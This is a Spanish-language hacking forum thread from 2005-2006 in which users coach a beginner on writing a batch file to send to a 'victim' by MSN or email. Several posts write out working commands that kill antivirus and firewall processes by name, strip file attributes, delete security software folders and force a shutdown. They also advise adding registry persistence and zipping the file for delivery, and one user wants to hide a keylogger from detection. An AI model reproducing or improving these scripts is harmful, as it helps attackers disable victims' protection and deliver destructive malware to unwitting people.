Comunidad Underground Hispana  

Retroceder   Comunidad Underground Hispana > Hack Novato > Troyanos y virus

Respuesta Crear Nuevo Tema

Compartir en twitter LinkBack Herramientas Desplegado
Antiguo 27-dic-2005, 20:19   #1
resaca1320
Guest

Amigos
Predeterminado Desactivar los firewall y antivirus de la victima ayuda

saludos tengo varias dos preguntas acecas de los archivos bat primero cuando ya tnego esto creado en notepad:

@ echo off
cd \
cd “archivos de programa”
del /Q /F /S “Nombre de la carpeta del antivirus”
del /Q /F /S “Nombre de la carpeta del firewall”
shutdown –s –t 1

donde dice el nombre del antivirus lo pongo ok pero en el firewall no se que poner que hago?? y despues de ahy que hago ????????????????? para terminarlo y para mandarlo a la victima
???
Antiguo 28-dic-2005, 04:26   #2
Gran Colaborador

Amigos 1
Agradecido 0 veces en 0 mensajes.
Predeterminado Re: Desactivar los firewall y antivirus de la victima ayuda

en donde dice firewall pones el firewall que tenga la victima, y cuando lo vayas a guardar le das a guardar como, y debajo del nombre en vez de poner: documento de texto, seleccionas: todos los archivos y pones de nombre, "creacion.bat" o el nombre que quieras pero con el .bat siempre.

Otra cosa, si al final pones shutdown –s –t -f 1
va a ser mejor porque la -f lo que va a hacer el forzar

Saludos!!

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

<br />
henry_gorfo está desconectado   Responder Citando
Antiguo 28-dic-2005, 04:44   #3
Sub7 Dark
Guest

Amigos

No es tan facil eliminar un antivirus o firewall con un bat de esos ya que si el firewall o el antivirus esté en uso te va ha tirar un error de que el archio no se puede borrar la solucion es que añada al registro la orden ya que se inicia más rapido que cualquier antivirus para esto te recominedo el all destroy by lokisho que hace esto si no lo elimina a la primera en cuanto inicie sesion se lo cepilla.

Con respecto a tu bat para terminarlo si te gusta esperoimentar pues le pones el nombre de la carpeta de el firewall por ejemplo si usa el zone alarm pon esto

del /Q /F /S “Zone Labs”

luego las ordenes las copias las pegas en un editor de texto plano (el tipico notepad.exe(bolckdenotas))o si quieres lo puedes hacer desde sell pniendo edit archivo.bat le pones las ordenes y le das a guardar como y lo guardas cuando ya lo tengas listo lo comprimes a .zip (nota:digo zip porque se puede dar el caso de que la victima no tenga instalado el winRAR que en varios casos me a pasado y el windows xp te deja abrir los zip) una vez comprimido en zip se lo mandas a tu victima por msn,mail,etc...

PD Sigo diciendo que es mejor lo de añadir al registro en un caso u en otro ya que si consiguiese por pura chorra que el tio desactivase el antivirus y el firewall se lo borras bien pero luego lo vuelve a instalar y te puedo asegurar que no te aceptará otra vez el mismo archivo si le pones lo del registro se lo borras bien cuando lo instale otra vez reinicia y se buelbe a borrar

PD2 Perdona la ortografia

Bytes
Antiguo 28-dic-2005, 11:34   #4
resaca1320
Guest

Amigos

hola a todos

muchas gracias pero solo tengo una duda con los firewall por ejemplo si yo se que la victima tiene norton , cual es el nombre del firewall que tendra la victima osea no me se los nombres de los firewalls alquien que se apiade de mi !

saludos y gracias a todos
Antiguo 09-ene-2006, 09:09   #5
*Tiger*
Guest

Amigos

A ver.... la victima tiene el Norton (antivirus).... x ahi no tiene firewall... si tiene, lo consiguio de algun lado (kizaz lo compro)... el firewall lo instalas como el antivirus... cuando lo instalas se crea una carpeta.... (= ke el antivirus)...

EJ:@ echo off
cd \
cd “archivos de programa”
del /Q /F /S “Norton antivirus”
del /Q /F /S “Kerio Personal Firewall”
shutdown –s –t -f 1
Antiguo 09-ene-2006, 09:44   #6
Gran Colaborador

Amigos 1
Agradecido 0 veces en 0 mensajes.

Cita:
Iniciado por *Tiger*
A ver.... la victima tiene el Norton (antivirus).... x ahi no tiene firewall...
Pues el norton si que tiene firewall propio y con poner del /Q /F /S “Norton antivirus” ya eliminamos el antivirus y el firewall de golpe ;D
Cita:
Iniciado por Sub7 Dark
No es tan facil eliminar un antivirus o firewall con un bat de esos ya que si el firewall o el antivirus esté en uso te va ha tirar un error de que el archio no se puede borrar
@ echo off Esto lo pondremos para que no muestre ningún comando por pantalla y /S se pone para que lo haga en silencio y no muestre ningun comando en la pantalla.

Si tienes razon que si se esta ejecutando no dara ese error (pero no se mostrara en pantalla) y solo lo dara con el .exe pero con el shutdown –s –t -f 1 se reinicia el pc y sin el resto de archivos no se podra iniciar ;D

Saludos!!

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

<br />
henry_gorfo está desconectado   Responder Citando
Antiguo 09-ene-2006, 13:19   #7
*Tiger*
Guest

Amigos

Ok, no sabia ke el Norton tenia Firewall, yo puse como eliminar el personal firewall si la victima tenia uno....

Una pregunta... el bat hay ke pasarlo a exe???
Antiguo 09-ene-2006, 13:28   #8
binladen
Guest

Amigos

Cita:
Iniciado por resaca1320
hola a todos

muchas gracias pero solo tengo una duda con los firewall por ejemplo si yo se que la victima tiene norton , cual es el nombre del firewall que tendra la victima osea no me se los nombres de los firewalls alquien que se apiade de mi !

saludos y gracias a todos
mmm. buska por google las rutas y procesos o bien deskargate el firewall y ves kual es el nombre del proceso y ke karpetas krea.

Cita:
Iniciado por *Tiger*
Una pregunta... el bat hay ke pasarlo a exe???
si keres.
Antiguo 04-feb-2006, 07:10   #9
.:Vorson:.
Guest

Amigos

Hola que tal a todos, soy nuevo en este foro y me gustaria que me enviaran el pass del all destroy puesot que soy MANIATICO de los keylogger es como una enfermedad que tengo que me gusta ver lo que los demas escriben jajajajajajaja y como en perfect keylogger lo detectan los antivirus este programa me parece una herramienta perfecta para usar ese keylogger, gracias
Antiguo 04-feb-2006, 13:38   #10
Hendrix
Guest

Amigos

Weno, les dire el truco de como matar AV's, firewalls, Anti malware...todo esto EN TIEMPO REAL (no es necesario reiniciar el PC), alguien dijo ke era dificil matar un AV en batch. pos aki van las "lineas magikas":

Taskkill /f /IM nombredelproceso.exe

attrib -H -S -R *.*

del /s /q *.*

Y ya esta!!!! facil, no???

Ejemplo para matar el Zone Alarmo (elegido a boleo porke tiene pokos procesos (1 proceso :P )), aki va:

Taskkill /f /IM zlclient.exe
cd C:\Archivos de Programa\Zona Alarm
Attrib -H -S -R *.*
del /s /q *.*

Zone Alarmo K.O

Weno, ahora es solo saber los procesos de los AV's y repetir este proceso muuuuuchas veces....

PD: para enkontrar info sobre procesos y rutas de instalacion todo en uno buske en los foros de Spyware, kuando las "viktimas" pongoan su Hijtrack (o algo parecido, no me akuerdo :P :P ) alli estan los procesos de lo ke se ejekuta y su ruta...Y komo las viktimas tienen av's.... No les digo mas, busken ustedes

Salu2

Hendrix

Antiguo 04-feb-2006, 16:47   #11
.:Vorson:.
Guest

Amigos
Predeterminado lalalalalalala

aja, eso me gusta, pero en tal caso de que fuesen mas procesos por ejemplo panda antivirus con el firewall
(los procesos son: pavsrv51.exe, pavfires.exe, pavproxy.exe)

como seria entonces?
Antiguo 04-feb-2006, 16:59   #12
Hendrix
Guest

Amigos

seria modificando el Taskkill asi:

Taskkill /f /IM pavsrv51.exe /IM pavfires.exe /IM pavproxy.exe
y lo demas =...

Weno, Salu2

Hendrix

Antiguo 05-feb-2006, 15:01   #13
gouki
Guest

Amigos

Yo probé hacer el taskkill para el kapersky ( o como se escriba) y no me dejaba, lo q es raro.
Si alguien sabe como por favor que me diga.
Antiguo 05-feb-2006, 15:38   #14
Hendrix
Guest

Amigos

pero borrabas los archivos????Si no los borras pondra acceso denegado (porke se vuelven a ejekutar automaticamente)...
Prueba a eliminar la carpeta del Kasper haber si va...

Salu2

Hendrix

Antiguo 06-feb-2006, 00:49   #15
elquemero
Guest

Amigos

Tengan en cuenta que no siempre se pueden borrar todos los archivos de los AV pero si los suficientes como para dejarlo inutil
Respuesta

Herramientas
Desplegado

Normas de Publicación